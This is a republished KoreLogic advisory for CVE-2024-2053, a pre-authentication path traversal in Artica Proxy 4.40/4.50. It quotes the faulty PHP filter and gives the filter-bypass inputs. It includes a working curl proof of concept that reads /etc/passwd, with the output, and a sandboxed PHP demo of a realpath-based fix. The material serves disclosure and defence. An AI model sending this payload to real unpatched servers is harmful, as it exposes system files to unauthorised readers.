
Artica Proxy 4.40 / 4.50 Local File Inclusion / Traversal

Posted Mar 6, 2024
Authored by Jaggar Henry | Site korelogic.com

Artica Proxy versions 4.40 and 4.50 suffer from a local file inclusion protection bypass vulnerability that allows for path traversal.

tags | exploit, local, bypass, file inclusion
advisories | CVE-2024-2053
SHA-256 | ee5d3d2cce629647f1cc48769c74910aca7883ad99b79b7b1c766a0e28a65ddf

KL-001-2024-001: Artica Proxy Unauthenticated LFI Protection Bypass Vulnerability

Title: Artica Proxy Unauthenticated LFI Protection Bypass Vulnerability
Advisory ID: KL-001-2024-001
Publication Date: 2024.03.05
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt


1. Vulnerability Details

Affected Vendor: Artica
Affected Product: Artica Proxy
Affected Version: 4.40 and 4.50
Platform: Debian 10 LTS
CWE Classification: CWE-23: Relative Path Traversal
CVE ID: CVE-2024-2053


2. Vulnerability Description

The Artica Proxy administrative web application attempts to
prevent local file inclusion. These protections can be bypassed,
and arbitrary files requested by unauthenticated users will be
returned according to the privileges of the "www-data" user.


3. Technical Description

Prior to authentication, a user can send an HTTP request to
the "images.listener.php" endpoint. This endpoint processes
the "mailattach" query parameter and concatenates the
user-supplied value to the "/opt/artica/share/www/attachments/"
file path. The contents of the file located at the newly
created path are returned in the HTTP response body.

The "images.listener.php" endpoint attempts to prevent
a local file inclusion vulnerability by stripping strings
that attempt to traverse into the parent directory from
the user-supplied "mailattach" value:

$_GET["mailattach"]=str_replace("////","/",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("///","/",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("//","/",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("../","",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("/etc/","",$_GET["mailattach"]);
$_GET["mailattach"]=str_replace("passwd","",$_GET["mailattach"]);
$file="/opt/artica/share/www/attachments/{$_GET["mailattach"]}";
header("Content-type: application/force-download" );
header("Content-Disposition: attachment; filename=\"{$_GET["mailattach"]}\"");
header("Content-Length: ".filesize($file)."" );
header("Expires: 0" );
readfile($file);

If effective, this approach would limit files
accessible by this endpoint to those within the
"/opt/artica/share/www/attachments/" directory. Unfortunately,
the removal of the "../" string is only performed once, and
the resulting file path is not checked. By using the path
"..././foo.txt", the "images.listener.php" endpoint removes the
"../" string resulting in "../foo.txt" - a relative file path
that traverses to the parent directory.

The strings "/etc/" and "passwd" are also stripped from the file
path, as many methods of detecting a path traversal vulnerability
rely on fetching the "/etc/passwd" file. By inserting these
strings into specific locations, a user-supplied "mailattach"
value such as "/epasswdtc/ppasswdasswd" is transformed into
"/etc/passwd", bypassing the protection entirely.

An unauthenticated user can leverage this endpoint to read
files on the system, according to the privileges of the
"www-data" user.
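
The filter's behaviour on the inputs above, next to a
resolve-then-check lookup, as an added example (not KoreLogic's
or Artica's code; the function names, the temporary directory
layout and the sample file names are assumptions made for the
illustration):

```php
<?php
// Filter chain copied from the advisory's images.listener.php excerpt.
// Each replacement runs once, left to right, and the result is never re-checked.
function advisory_filter(string $v): string {
    foreach (["////" => "/", "///" => "/", "//" => "/",
              "../" => "", "/etc/" => "", "passwd" => ""] as $find => $repl) {
        $v = str_replace($find, $repl, $v);
    }
    return $v;
}

// Hypothetical hardened lookup: do not rewrite the input at all.
// Canonicalise the full path, then require it to stay under the base directory.
function resolve_attachment(string $base, string $name): ?string {
    $root = realpath($base);
    if ($root === false || $name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    $real = realpath($root . DIRECTORY_SEPARATOR . $name);
    if ($real === false || !is_file($real)) {
        return null;                       // missing file or not a regular file
    }
    // Compare against "$root/" so a sibling such as "attachments-old" cannot match.
    $prefix = $root . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed sandbox: one file inside the attachments directory, one outside it.
$base = sys_get_temp_dir() . "/kl_demo_" . getmypid();
mkdir("$base/attachments", 0700, true);
file_put_contents("$base/attachments/report.txt", "inside");
file_put_contents("$base/secret.txt", "outside");

// Inputs: a normal name, a plain traversal, and the two forms from the advisory.
$inputs = ["report.txt", "../secret.txt", "..././secret.txt", "/epasswdtc/ppasswdasswd"];
foreach ($inputs as $in) {
    $served = resolve_attachment("$base/attachments", $in);
    printf("%-24s filter=%-14s resolver=%s\n", $in, advisory_filter($in),
           $served === null ? "rejected" : "served");
}

// Remove the sandbox.
unlink("$base/attachments/report.txt");
unlink("$base/secret.txt");
rmdir("$base/attachments");
rmdir($base);
```

The resolver serves a file only when the canonical path returned
by realpath() is still under the attachments directory, so it
does not depend on which substrings were stripped or in what order.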


4. Mitigation and Remediation Recommendation

No response from vendor; no remediation available.


5. Credit

This vulnerability was discovered by Jaggar Henry of KoreLogic,
Inc.


6. Disclosure Timeline

2023.12.18 - KoreLogic requests vulnerability contact and
secure communication method from Artica.
2023.12.18 - Artica Support issues automated ticket #1703011342
promising follow-up from a human.
2024.01.10 - KoreLogic again requests vulnerability contact and
secure communication method from Artica.
2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from
mail.articatech.com with response
"Client host rejected: Go Away!"
2024.01.11 - KoreLogic requests vulnerability contact and
secure communication method via
https://www.articatech.com/ 'Contact Us' web form.
2024.01.23 - KoreLogic requests CVE from MITRE.
2024.01.23 - MITRE issues automated ticket #1591692 promising
follow-up from a human.
2024.02.01 - 30 business days have elapsed since KoreLogic
attempted to contact the vendor.
2024.02.06 - KoreLogic requests update on CVE from MITRE.
2024.02.15 - KoreLogic requests update on CVE from MITRE.
2024.02.22 - KoreLogic reaches out to alternate CNA for
CVE identifiers.
2024.02.26 - 45 business days have elapsed since KoreLogic
attempted to contact the vendor.
2024.02.29 - Vulnerability details presented to AHA!
(takeonme.org) by proxy.
2024.03.01 - AHA! issues CVE-2024-2053 to track this
vulnerability.
2024.03.05 - KoreLogic public disclosure.


7. Proof of Concept

$ curl -k 'https://192.168.2.129:9000/images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
mysql:x:105:112:MySQL Server,,,:/nonexistent:/bin/false
quagga:x:106:114:Quagga routing suite,,,:/run/quagga/:/usr/sbin/nologin
apt-mirror:x:107:115::/var/spool/apt-mirror:/bin/sh
privoxy:x:108:65534::/etc/privoxy:/usr/sbin/nologin
ntp:x:109:117::/nonexistent:/usr/sbin/nologin
redsocks:x:110:118::/var/run/redsocks:/usr/sbin/nologin
prads:x:111:120::/home/prads:/usr/sbin/nologin
freerad:x:112:121::/etc/freeradius:/usr/sbin/nologin
vnstat:x:113:122:vnstat daemon,,,:/var/lib/vnstat:/usr/sbin/nologin
stunnel4:x:114:123::/var/run/stunnel4:/usr/sbin/nologin
sshd:x:115:65534::/run/sshd:/usr/sbin/nologin
vde2-net:x:116:124::/var/run/vde2:/usr/sbin/nologin
memcache:x:117:125:Memcached,,,:/nonexistent:/bin/false
davfs2:x:118:126::/var/cache/davfs2:/usr/sbin/nologin
ziproxy:x:119:127::/var/run/ziproxy:/usr/sbin/nologin
proftpd:x:120:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:121:65534::/srv/ftp:/usr/sbin/nologin
mosquitto:x:122:128::/var/lib/mosquitto:/usr/sbin/nologin
openldap:x:123:129:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
munin:x:124:130:munin application user,,,:/var/lib/munin:/usr/sbin/nologin
msmtp:x:125:131::/var/lib/msmtp:/usr/sbin/nologin
Debian-snmp:x:126:132::/var/lib/snmp:/bin/false
opendkim:x:127:133::/var/run/opendkim:/usr/sbin/nologin
avahi:x:128:134:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
glances:x:129:135::/var/lib/glances:/usr/sbin/nologin
ArticaStats:x:1000:1000:ArticaStats:/home/ArticaStats:/bin/bash
Debian-exim:x:130:138::/var/spool/exim4:/usr/sbin/nologin
smokeping:x:131:139:SmokePing daemon,,,:/var/lib/smokeping:/usr/sbin/nologin
debian-spamd:x:132:140::/var/lib/spamassassin:/bin/sh
netdata:x:1001:1002:netdata:/home/netdata:/bin/bash
postfix:x:1002:1001::/home/postfix:/bin/sh
...
...


The contents of this advisory are copyright(c) 2024
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
